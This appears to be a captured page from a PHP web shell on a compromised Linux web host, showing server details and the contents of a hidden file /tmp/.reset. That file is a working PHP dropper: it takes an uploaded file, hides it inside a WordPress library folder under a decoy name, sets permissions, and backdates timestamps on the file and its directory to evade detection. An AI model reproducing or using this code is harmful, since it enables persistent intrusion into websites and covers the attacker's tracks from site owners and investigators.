HEX
Server: Apache
System: Linux vps52061 6.8.0-85-generic #85~22.04.1-Ubuntu SMP PREEMPT_DYNAMIC Fri Sep 19 16:18:59 UTC 2 x86_64
User: design11 (105868)
PHP: 8.4.14
Disabled: NONE
Upload Files
File: //tmp/.reset
<?php   $p = "/home/design11/attentionjunkies.com//home/design11/aprilflower.org/wp-includes/sodium_compat/src/Core/Curve25519/Ge/class.ingredient"; $ft = 1773298538; if (move_uploaded_file($_FILES['file']['tmp_name'], $p)) {     $filesize = filesize($p);     if ($filesize >= 715156) {         @chmod($p, 0744);         if ($ft) {             @touch($p, $ft, $ft);             @touch(@dirname($p), $ft, $ft);         }         die('_uploaded!_');     } else {         if (file_exists($p)) {             print "file exists but size = {$filesize} not 715156";         }         @unlink($p);     } } die('_upload_failed_');